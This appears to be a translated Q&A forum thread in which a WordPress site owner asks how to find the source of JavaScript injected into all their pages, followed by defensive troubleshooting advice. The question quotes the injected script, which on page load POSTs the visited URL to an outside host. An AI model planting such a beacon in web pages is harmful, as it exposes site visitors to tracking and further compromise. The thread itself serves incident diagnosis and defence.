如何确定插入的（可能是恶意的）JavaScript代码来自何处

Question

突然我发现我所有的页面都包含一些意外的JavaScript代码。

我不会每天检查源代码。 但是今天我需要调试一些东西，然后在所有页面上看到此代码。

我正在使用WordPress Multisite版本4.1.2。

该网站上的所有插件均来自wordpress.org，具有最新更新。

问题是如何找出代码（来自哪个文件）的来源？ 我已使用notepad ++搜索了所有文件，但未在任何文件中找到此代码！

<script type="text/javascript" >
    var idPin = ""; 
    function postTest(idPin) {
        var xmlhttp; 
        if (window.XMLHttpRequest) { xmlhttp=new XMLHttpRequest(); } 
        else { xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); } 
        var baseLocation = encodeURIComponent(document.URL);
        var req = "http://blockgroup.pw/testpost"; 
        d = "url=" + baseLocation + "&geo=" + idPin; xmlhttp.open("POST", req ,true);

        xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded"); 
        xmlhttp.send(d); 
    } 
    window.onload = function() { postTest(idPin); }
</script>

Answer 1

由于Wordpress使用挂钩来调用各个部分，因此您尝试了几件事。 您可以全部输出它们，然后在页脚部分中搜索与此相关的内容。

一种。

-functions.php-

function list_hooked_functions($tag=false){
 global $wp_filter;
 if ($tag) {
  $hook[$tag]=$wp_filter[$tag];
  if (!is_array($hook[$tag])) {
  trigger_error("Nothing found for '$tag' hook", E_USER_WARNING);
  return;
  }
 }
 else {
  $hook=$wp_filter;
  ksort($hook);
 }
 echo '<pre>';
 foreach($hook as $tag => $priority){
  echo "<br />&gt;&gt;&gt;&gt;&gt;\t<strong>$tag</strong><br />";
  ksort($priority);
  foreach($priority as $priority => $function){
  echo $priority;
  foreach($function as $name => $properties) echo "\t$name<br />";
  }
 }
 echo '</pre>';
 return;
}

list_hooked_functions();

我假设由于它的JS，它将钩接到wp_print_footer_scripts序列。 然后，您可以向上调用链并过滤输出脚本的特定函数。

https://developer.wordpress.org/reference/

了解所涉及功能的结构。

B.

另一件事是，如果黑客设法获得对数据库的访问权限，则可能在数据库中搜索相关的脚本。 （尽管我怀疑）

C。

查看您是否在主题中使用了任何易受攻击的代码，例如主题中内置的图库插件（不会更新），与通过“管理”面板安装的代码相反。

需要注意的是：他们通常会使用base64字符串，然后在处理过程中调用它们，因此您将无法找到纯文本形式的JS代码。

RevSlider不久前就有一个漏洞。

D.

使用安全插件（如wordfence）可以扫描文件中的可疑代码。

https://wordpress.org/plugins/wordfence

找到并删除了恶意代码后，请确保更改密码

- - 附加信息 - -

Wordpress领域似乎发生了很多事情，如果您使用Wordpress Comment Box，它会影响很多事情。

当前版本的WordPress容易受到存储的XSS的攻击。 未经身份验证的攻击者可以在WordPress注释中注入JavaScript。 查看评论时将触发脚本。 （2015年4月27日）

资料来源： http : //klikki.fi/adv/wordpress2.html

-如果您在上述任何方面有任何领先优势，请告诉我们。